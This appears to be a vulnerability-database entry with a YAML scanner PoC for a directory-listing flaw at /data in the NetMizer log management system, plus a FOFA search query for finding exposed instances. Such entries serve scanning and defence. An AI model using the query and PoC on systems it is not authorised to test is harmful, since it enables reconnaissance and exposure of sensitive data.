netmizer-log-management-data-directory-traversal: NetMizer 日志管理系统 data 目录遍历漏洞

2025-08-01 NetMizer日志管理系统 PoC Public

Description

北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。

fofa: title="NetMizer 日志管理系统"

PoC

id: netmizer-log-management-data-directory-traversal

info:
  name: NetMizer 日志管理系统 data 目录遍历漏洞
  author: zan8in
  severity: medium
  description: |-
    北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞,由于 /data 控制不严格,攻击者可利用该漏洞获取敏感信息。
    fofa: title="NetMizer 日志管理系统"
  tags: netmizer,traversal
  created: 2025/03/19

rules:
  r0:
    request:
      method: GET
      path: /data
    expression: response.status == 200 && response.body.bcontains(b'Index of /data') && response.body.bcontains(b'Parent Directory')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities